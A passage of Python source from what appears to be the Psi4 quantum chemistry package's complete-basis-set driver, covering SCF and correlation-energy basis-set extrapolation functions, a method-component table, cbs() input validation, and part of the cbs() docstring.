beta_division = 1 / (math.exp(-1 * alpha) * (math.exp(math.sqrt(zHI)) - math.exp(math.sqrt(zLO))))
beta_mult = math.exp(-1 * alpha * math.sqrt(zHI))
if isinstance(valueLO, float):
beta = (valueHI - valueLO) * beta_division
value = valueHI - beta * beta_mult
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Karton 2-point power form SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.name = 'Karton SCF (%s, %s) beta' % (zLO, zHI)
beta.subtract(valueLO)
beta.scale(beta_division)
beta.scale(beta_mult)
value = valueHI.clone()
value.subtract(beta)
value.name = 'Karton SCF (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Karton 2-point power from SCF extrapolation for method: %s <==\n\n""" %
(functionname.upper()))
core.print_out(""" LO-zeta (%s)""" % str(zLO))
core.print_out(""" LO-zeta Data""")
valueLO.print_out()
core.print_out(""" HI-zeta (%s)""" % str(zHI))
core.print_out(""" HI-zeta Data""")
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % (alpha))
core.print_out(""" Beta Data:\n""")
beta.print_out()
return value
else:
raise ValidationError("scf_xtpl_Karton_2: datatype is not recognized '%s'." % type(valueLO))
def scf_xtpl_helgaker_3(functionname: str, zLO: int, valueLO: float, zMD: int, valueMD: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme for reference energies with three adjacent zeta-level bases.
Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zMD
Intermediate zeta level. Should be equal to zLO + 1.
valueMD
Intermediate value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 2.
valueHI
Higher value used for extrapolation.
alpha
Not used.
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [4]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta e^{-\alpha X}, \alpha = 3.0`
References
----------
.. [4] Halkier, Helgaker, Jorgensen, Klopper, & Olsen, Chem. Phys. Lett. 302 (1999) 437-446,
DOI: 10.1016/S0009-2614(99)00179-7
"""
if (type(valueLO) != type(valueMD)) or (type(valueMD) != type(valueHI)):
raise ValidationError("scf_xtpl_helgaker_3: Inputs must be of the same datatype! (%s, %s, %s)" %
(type(valueLO), type(valueMD), type(valueHI)))
if isinstance(valueLO, float):
ratio = (valueHI - valueMD) / (valueMD - valueLO)
alpha = -1 * math.log(ratio)
beta = (valueHI - valueMD) / (math.exp(-1 * alpha * zMD) * (ratio - 1))
value = valueHI - beta * math.exp(-1 * alpha * zHI)
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Helgaker 3-point SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ MD-zeta (%s) Energy: % 16.12f\n""" % (str(zMD), valueMD)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zMD].upper(),
_zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
valueLO = np.array(valueLO)
valueMD = np.array(valueMD)
valueHI = np.array(valueHI)
nonzero_mask = np.abs(valueHI) > 1.e-14
top = (valueHI - valueMD)[nonzero_mask]
bot = (valueMD - valueLO)[nonzero_mask]
ratio = top / bot
alpha = -1 * np.log(np.abs(ratio))
beta = top / (np.exp(-1 * alpha * zMD) * (ratio - 1))
np_value = valueHI.copy()
np_value[nonzero_mask] -= beta * np.exp(-1 * alpha * zHI)
np_value[~nonzero_mask] = 0.0
# Build and set from numpy routines
value = core.Matrix(*valueHI.shape)
value_view = np.asarray(value)
value_view[:] = np_value
return value
else:
raise ValidationError("scf_xtpl_helgaker_3: datatype is not recognized '%s'." % type(valueLO))
#def corl_xtpl_helgaker_2(functionname, valueSCF, zLO, valueLO, zHI, valueHI, verbose=True):
def corl_xtpl_helgaker_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme for correlation energies with two adjacent zeta-level bases.
Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 3.0`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [5]_:
:math:`E_{corl}^X = E_{corl}^{\infty} + \beta X^{-alpha}`
References
----------
.. [5] Halkier, Helgaker, Jorgensen, Klopper, Koch, Olsen, & Wilson,
Chem. Phys. Lett. 286 (1998) 243-252,
DOI: 10.1016/S0009-2614(99)00179-7
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"corl_xtpl_helgaker_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 3.0
if isinstance(valueLO, float):
value = (valueHI * zHI**alpha - valueLO * zLO**alpha) / (zHI**alpha - zLO**alpha)
beta = (valueHI - valueLO) / (zHI**(-alpha) - zLO**(-alpha))
# final = valueSCF + value
final = value
if verbose:
# Output string with extrapolation parameters
cbsscheme = """\n\n ==> Helgaker 2-point correlated extrapolation for method: %s <==\n\n""" % (
functionname.upper())
# cbsscheme += """ HI-zeta (%1s) SCF Energy: % 16.12f\n""" % (str(zHI), valueSCF)
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % alpha
cbsscheme += """ Extrapolated Energy: % 16.12f\n\n""" % value
#cbsscheme += """ LO-zeta (%s) Correlation Energy: % 16.12f\n""" % (str(zLO), valueLO)
#cbsscheme += """ HI-zeta (%s) Correlation Energy: % 16.12f\n""" % (str(zHI), valueHI)
#cbsscheme += """ Beta (coefficient) Value: % 16.12f\n""" % beta
#cbsscheme += """ Extrapolated Correlation Energy: % 16.12f\n\n""" % value
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (19 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % final
core.print_out(cbsscheme)
return final
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.subtract(valueLO)
beta.scale(1 / (zHI**(-alpha) - zLO**(-alpha)))
beta.name = 'Helgaker Corl (%s, %s) beta' % (zLO, zHI)
value = valueHI.clone()
value.scale(zHI**alpha)
tmp = valueLO.clone()
tmp.scale(zLO**alpha)
value.subtract(tmp)
value.scale(1 / (zHI**alpha - zLO**alpha))
value.name = 'Helgaker Corr (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Helgaker 2-point correlated extrapolation for """
"""method: %s <==\n\n""" % (functionname.upper()))
core.print_out(""" LO-zeta (%s) Data\n""" % (str(zLO)))
valueLO.print_out()
core.print_out(""" HI-zeta (%s) Data\n""" % (str(zHI)))
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % alpha)
core.print_out(""" Beta Data:\n""")
beta.print_out()
# value.add(valueSCF)
return value
else:
raise ValidationError("corl_xtpl_helgaker_2: datatype is not recognized '%s'." % type(valueLO))
def return_energy_components():
"""Define some quantum chemical knowledge, namely what methods are subsumed in others."""
# yapf: disable
VARH = {}
VARH['scf'] = {
'scf': 'SCF TOTAL ENERGY'}
VARH['hf'] = {
'hf': 'HF TOTAL ENERGY'}
VARH['mp2'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY'}
VARH['mp2d'] = {
'hf': 'HF TOTAL ENERGY',
'mp2d': 'MP2D TOTAL ENERGY'}
VARH['mp2.5'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY'}
VARH['mp3'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY'}
VARH['mp4(sdq)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY'}
VARH['mp4'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY',
'mp4': 'MP4 TOTAL ENERGY'}
VARH['omp2'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'omp2': 'OMP2 TOTAL ENERGY'}
VARH['omp2.5'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'omp2.5': 'OMP2.5 TOTAL ENERGY'}
VARH['omp3'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'omp3': 'OMP3 TOTAL ENERGY'}
VARH['olccd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'olccd': 'OLCCD TOTAL ENERGY'}
VARH['lccd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'lccd': 'LCCD TOTAL ENERGY'}
VARH['lccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'lccsd': 'LCCSD TOTAL ENERGY'}
VARH['cepa(0)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cepa(0)': 'CEPA(0) TOTAL ENERGY'}
VARH['cepa(1)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cepa(1)': 'CEPA(1) TOTAL ENERGY'}
VARH['cepa(3)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cepa(3)': 'CEPA(3) TOTAL ENERGY'}
VARH['acpf'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'acpf': 'ACPF TOTAL ENERGY'}
VARH['aqcc'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'aqcc': 'AQCC TOTAL ENERGY'}
VARH['qcisd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY',
'qcisd': 'QCISD TOTAL ENERGY'}
VARH['cc2'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cc2': 'CC2 TOTAL ENERGY'}
VARH['ccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY'}
VARH['bccd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'bccd': 'CCSD TOTAL ENERGY'}
VARH['cc3'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cc3': 'CC3 TOTAL ENERGY'}
VARH['fno-ccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'fno-ccsd': 'CCSD TOTAL ENERGY'}
VARH['fno-ccsd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'fno-ccsd': 'CCSD TOTAL ENERGY',
'fno-ccsd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['qcisd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY',
'qcisd': 'QCISD TOTAL ENERGY',
'qcisd(t)': 'QCISD(T) TOTAL ENERGY'}
VARH['ccsd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY',
'ccsd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['ccsd(at)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY',
'ccsd(at)': 'CCSD(AT) TOTAL ENERGY'}
VARH['bccd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY',
'bccd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['cisd'] = {
'hf': 'HF TOTAL ENERGY',
'cisd': 'CISD TOTAL ENERGY'}
VARH['cisdt'] = {
'hf': 'HF TOTAL ENERGY',
'cisdt': 'CISDT TOTAL ENERGY'}
VARH['cisdtq'] = {
'hf': 'HF TOTAL ENERGY',
'cisdtq': 'CISDTQ TOTAL ENERGY'}
VARH['fci'] = {
'hf': 'HF TOTAL ENERGY',
'fci': 'FCI TOTAL ENERGY'}
VARH['mrccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsd': 'CCSD TOTAL ENERGY'}
VARH['mrccsd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsd': 'CCSD TOTAL ENERGY',
'mrccsd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['mrccsdt'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsdt': 'CCSDT TOTAL ENERGY'}
VARH['mrccsdt(q)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsdt': 'CCSDT TOTAL ENERGY',
'mrccsdt(q)': 'CCSDT(Q) TOTAL ENERGY'}
for cilevel in range(2, 99):
VARH[f'ci{cilevel}'] = {
'hf': 'HF TOTAL ENERGY',
f'ci{cilevel}': 'CI TOTAL ENERGY'}
for mplevel in range(5, 99):
VARH[f'mp{mplevel}'] = {
'hf': 'HF TOTAL ENERGY',
f'mp{mplevel}': f'MP{mplevel} TOTAL ENERGY'}
for mplevel2 in range(2, mplevel):
VARH[f'mp{mplevel}'][f'mp{mplevel2}'] = f'MP{mplevel2} TOTAL ENERGY'
# Integrate CFOUR methods
VARH.update(cfour_psivar_list())
return VARH
# yapf: enable
VARH = return_energy_components()
def _get_default_xtpl(nbasis: int, xtpl_type: str) -> Callable:
""" A helper function to determine default extrapolation type.
Parameters
----------
nbasis
Number of basis sets
xtpl_type
{'scf', 'corl'}
Extrapolation type: 'scf' for the total energy, 'corl' for just the
correlation component.
Returns
-------
Callable
Extrapolation function to be used.
"""
if nbasis == 1 and xtpl_type in ["scf", "corl"]:
return xtpl_highest_1
elif xtpl_type == "scf":
if nbasis == 2:
return scf_xtpl_helgaker_2
elif nbasis == 3:
return scf_xtpl_helgaker_3
else:
raise ValidationError(f"Wrong number of basis sets supplied to scf_xtpl: {nbasis}")
elif xtpl_type == "corl":
if nbasis == 2:
return corl_xtpl_helgaker_2
else:
raise ValidationError(f"Wrong number of basis sets supplied to corl_xtpl: {nbasis}")
else:
raise ValidationError(f"Stage treatment must be 'corl' or 'scf', not '{xtpl_type}'")
def _validate_cbs_inputs(cbs_metadata, molecule):
""" A helper function which validates the ``cbs_metadata`` format,
expands basis sets, and provides sensible defaults for optional arguments.
Parameters
----------
cbs_metadata : list
List of dicts containing CBS stage keywords.
molecule : qcdb.molecule or psi4.core.Molecule
Molecule to be passed to _expand_bracketed_basis()
Returns
-------
list
Validated list of dictionaries, with each item consisting of an extrapolation
stage. All validation takes place here.
"""
metadata = []
for iitem, item in enumerate(cbs_metadata):
# 1a) all items must have wfn
if "wfn" not in item:
raise ValidationError(f"Stage {iitem} doesn't have defined level of theory!")
# 1b) all items must have basis set
if "basis" not in item:
raise ValidationError(f"Stage {iitem} doesn't have defined basis sets!")
# 2a) process required stage parameters and assign defaults
stage = {}
stage["wfn"] = item["wfn"].lower()
stage["basis"] = _expand_bracketed_basis(item["basis"].lower(), molecule)
# 2b) if first item is not HF, generate it
if len(metadata) == 0 and stage["wfn"] not in ["hf", "c4-hf", "scf", "c4-scf"]:
scf = {}
if stage["wfn"].startswith("c4"):
scf["wfn"] = "c4-hf"
else:
scf["wfn"] = "hf"
scf["basis"] = ([stage["basis"][0][-1]], [stage["basis"][1][-1]])
scf["treatment"] = "scf"
scf["stage"] = "scf"
scf["scheme"] = _get_default_xtpl(len(scf["basis"][1]), scf["treatment"])
scf["alpha"] = None
scf["options"] = False
scf["options_lo"] = False
metadata.append(scf)
# 2c) keep processing current stage
stage["treatment"] = item.get("treatment", "scf" if len(metadata) == 0 else "corl")
stage["stage"] = item.get("stage", False)
if not stage["stage"]:
if len(metadata) == 0:
stage["stage"] = "scf"
elif len(metadata) == 1:
stage["stage"] = "corl"
else:
stage["stage"] = f"delta{len(metadata) - 1}"
stage["scheme"] = item.get("scheme", _get_default_xtpl(len(stage["basis"][1]), stage["treatment"]))
if len(metadata) > 0:
stage["wfn_lo"] = item.get("wfn_lo", metadata[-1].get("wfn")).lower()
stage["basis_lo"] = _expand_bracketed_basis(item.get("basis_lo", item["basis"]).lower(), molecule)
if len(stage["basis"][0]) != len(stage["basis_lo"][0]):
raise ValidationError("""Number of basis sets inconsistent
between high ({}) and low ({}) levels.""".format(
len(stage["basis"][0]), len(stage["basis_lo"][0])))
stage["alpha"] = item.get("alpha", None)
stage["options"] = item.get("options", False)
stage["options_lo"] = item.get("options_lo", False)
metadata.append(stage)
return (metadata)
def _process_cbs_kwargs(kwargs):
""" A helper function which translates supplied kwargs into the
``cbs_metadata`` format and passes it for validation.
Parameters
----------
kwargs : dict
kwargs containing the CBS function specification.
Returns
-------
list
List of dictionaries, with each item consisting of an extrapolation
stage. All validation takes place here.
"""
molecule = kwargs.get('molecule', core.get_active_molecule())
if "cbs_metadata" in kwargs:
# if we passed in a dict, validate it right away
cbs_metadata = kwargs["cbs_metadata"]
else:
# if we passed in options, check for consecutive correlations first
if "delta_wfn" in kwargs and "corl_wfn" not in kwargs:
raise ValidationError("Delta function supplied without corl_wfn defined.")
if "delta2_wfn" in kwargs and "delta_wfn" not in kwargs:
raise ValidationError("Second delta function supplied without delta_wfn defined.")
cbs_metadata = []
possible_stages = ["scf", "corl"]
while len(possible_stages) > 0:
sn = possible_stages.pop(0)
if f"{sn}_wfn" in kwargs and f"{sn}_basis" in kwargs:
# either both *_wfn and *_basis have to be specified
stage = {"wfn": kwargs[f"{sn}_wfn"], "basis": kwargs[f"{sn}_basis"]}
elif sn == "scf" and f"{sn}_basis" in kwargs:
# or we're at a scf stage which can be implied with a provided scf_basis
stage = {"wfn": "hf", "basis": kwargs[f"{sn}_basis"]}
else:
# otherwise go to the next possible stage
continue
# if we made it here, stage exists - parse other keywords
if f"{sn}_scheme" in kwargs:
stage["scheme"] = kwargs[f"{sn}_scheme"]
if f"{sn}_wfn_lesser" in kwargs:
stage["wfn_lo"] = kwargs[f"{sn}_wfn_lesser"]
if f"cbs_{sn}_alpha" in kwargs:
stage["alpha"] = kwargs[f"cbs_{sn}_alpha"]
elif f"{sn}_alpha" in kwargs:
stage["alpha"] = kwargs[f"{sn}_alpha"]
cbs_metadata.append(stage)
if sn == "corl":
possible_stages.append("delta")
elif sn == "delta":
possible_stages.append("delta2")
return _validate_cbs_inputs(cbs_metadata, molecule)
###################################
## Start of Complete Basis Set ##
###################################
def cbs(func, label, **kwargs):
r"""Function to define a multistage energy method from combinations of
basis set extrapolations and delta corrections and condense the
components into a minimum number of calculations.
:aliases: complete_basis_set()
:returns: (*float*) -- Total electronic energy in Hartrees
:PSI variables:
.. hlist::
:columns: 1
* :psivar:`CBS TOTAL ENERGY`
* :psivar:`CBS REFERENCE ENERGY`
* :psivar:`CBS CORRELATION ENERGY`
* :psivar:`CURRENT ENERGY`
* :psivar:`CURRENT REFERENCE ENERGY`
* :psivar:`CURRENT CORRELATION ENERGY`
.. caution:: Some features are not yet implemented. Buy a developer a coffee.
- No way to tell function to boost fitting basis size for all calculations.
- Need to add more extrapolation schemes
As represented in the equation below, a CBS energy method is defined in several
sequential stages (scf, corl, delta1, delta2, ... ) covering treatment
of the reference total energy, the correlation energy, a delta correction to the
correlation energy, and a second delta correction, etc.. Each is activated by its
stage_wfn keyword, or as a field in the ```cbs_metadata``` list, and is only
allowed if all preceding stages are active.
.. include:: /cbs_eqn.rst
* Energy Methods
The presence of a stage_wfn keyword is the indicator to incorporate
(and check for stage_basis and stage_scheme keywords) and compute
that stage in defining the CBS energy.
The cbs() function requires, at a minimum, ``name='scf'`` and ``scf_basis``
keywords to be specified for reference-step only jobs and ``name`` and
``corl_basis`` keywords for correlated jobs.
The following energy methods have been set up for cbs().
.. hlist::
:columns: 5
* scf
* hf
* mp2
* mp2.5
* mp3
* mp4(sdq)
* mp4
* mp\ *n*
* omp2
* omp2.5
* omp3
* olccd
* lccd
* lccsd
* cepa(0)
* cepa(1)
* cepa(3)
* acpf
* aqcc
* qcisd
* cc2
* ccsd
* fno-ccsd
* bccd
* cc3
* qcisd(t)
* ccsd(t)
* fno-ccsd(t)
* bccd(t)
* cisd
* cisdt
* cisdtq
* ci\ *n*
* fci
* mrccsd
* mrccsd(t)
* mrccsdt
* mrccsdt(q)
:type name: str
:param name: ``'scf'`` || ``'ccsd'`` || etc.
First argument, usually unlabeled. Indicates the computational method
for the correlation energy, unless only reference step to be performed,
in which case should be ``'scf'``. Overruled if stage_wfn keywords supplied.
:type scf_wfn: str
:param scf_wfn: |dl| ``'scf'`` |dr| || ``'c4-scf'`` || etc.
Indicates the energy method for which the reference energy is to be
obtained. Generally unnecessary, as 'scf' is *the* scf in |PSIfour| but
can be used to direct lone scf components to run in |PSIfour| or Cfour
in a mixed-program composite method.
:type corl_wfn: str
:param corl_wfn: ``'mp2'`` || ``'ccsd(t)'`` || etc.
Indicates the energy method for which the correlation energy is to be
obtained. Can also be specified with ``name`` or as the unlabeled
first argument to the function.
:type delta_wfn: str
:param delta_wfn: ``'ccsd'`` || ``'ccsd(t)'`` || etc.
Indicates the (superior) energy method for which a delta correction
to the correlation energy is to be obtained.
:type delta_wfn_lesser: str
:param delta_wfn_lesser: |dl| ``corl_wfn`` |dr| || ``'mp2'`` || etc.
Indicates the inferior energy method for which a delta correction
to the correlation energy is to be obtained.
:type delta2_wfn: str
:param delta2_wfn: ``'ccsd'`` || ``'ccsd(t)'`` || etc.
Indicates the (superior) energy method for which a second delta correction
to the correlation energy is to be obtained.
:type delta2_wfn_lesser: str
:param delta2_wfn_lesser: |dl| ``delta_wfn`` |dr| || ``'ccsd(t)'`` || etc.
Indicates the inferior energy method for which a second delta correction
to the correlation energy is to be obtained.
* Basis Sets
Currently, the basis set set through ``set`` commands have no influence
on a cbs calculation.
:type scf_basis: :ref:`basis string <apdx:basisElement>`
:param scf_basis: |dl| ``corl_basis`` |dr| || ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the reference energy.
If any correlation method is specified, ``scf_basis`` can default
to ``corl_basis``.
:type corl_basis: :ref:`basis string <apdx:basisElement>`
:param corl_basis: ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the correlation energy.
:type delta_basis: :ref:`basis string <apdx:basisElement>`
:param delta_basis: ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the delta correction
to the correlation energy.
:type delta2_basis: :ref:`basis string <apdx:basisElement>`
:param delta2_basis: ``'cc-pV[TQ]Z'`` || ``'jun-cc-pv[tq5]z'`` || ``'6-31G*'`` || etc.
Indicates the sequence of basis sets employed for the second delta correction
to the correlation energy.
* Schemes
Transformations of the energy through basis set extrapolation for each
stage of the CBS definition. A complaint is generated if number of basis
sets in stage_basis does not exactly satisfy requirements of stage_scheme.
An exception is the default, ``'xtpl_highest_1'``, which uses the best basis
set available. See :ref:`sec:cbs_xtpl` for all available schemes.
:type scf_scheme: Callable
:param scf_scheme: |dl| ``xtpl_highest_1`` |dr| || ``scf_xtpl_helgaker_3`` || etc.
Indicates the basis set extrapolation scheme to be applied to the reference energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_3` if three valid basis sets
present in ``psi4.driver.driver_cbs.scf_basis``, :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_2` if two valid basis
sets present in ``scf_basis``, and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_3`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_truhlar_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_karton_2`
:type corl_scheme: Callable
:param corl_scheme: |dl| ``xtpl_highest_1`` |dr| || ``corl_xtpl_helgaker_2`` || etc.
Indicates the basis set extrapolation scheme to be applied to the correlation energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` if two valid basis sets
present in ``corl_basis`` and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type delta_scheme: Callable
:param delta_scheme: |dl| ``xtpl_highest_1`` |dr| || ``corl_xtpl_helgaker_2`` || etc.
Indicates the basis set extrapolation scheme to be applied to the delta correction
to the correlation energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` if two valid basis sets
present in ``delta_basis`` and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type delta2_scheme: Callable
:param delta2_scheme: |dl| ``xtpl_highest_1`` |dr| || ``corl_xtpl_helgaker_2`` || etc.
Indicates the basis set extrapolation scheme to be applied to the second delta correction
to the correlation energy.
Defaults to :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` if two valid basis sets
present in ``delta2_basis`` and :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` otherwise.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1`
* :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2`
:type scf_alpha: float
:param scf_alpha: |dl| ``1.63`` |dr|
Overrides the default \alpha parameter used in the listed SCF extrapolation procedures.
Has no effect on others, including :py:func:`~psi4.driver.driver_cbs.xtpl_highest_1` and :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_3`.
.. hlist::
:columns: 1
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_helgaker_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_truhlar_2`
* :py:func:`~psi4.driver.driver_cbs.scf_xtpl_karton_2`
:type corl_alpha: float
:param corl_alpha: |dl| ``3.00`` |dr|
Overrides the default \alpha parameter used in the listed :py:func:`~psi4.driver.driver_cbs.corl_xtpl_helgaker_2` correlation
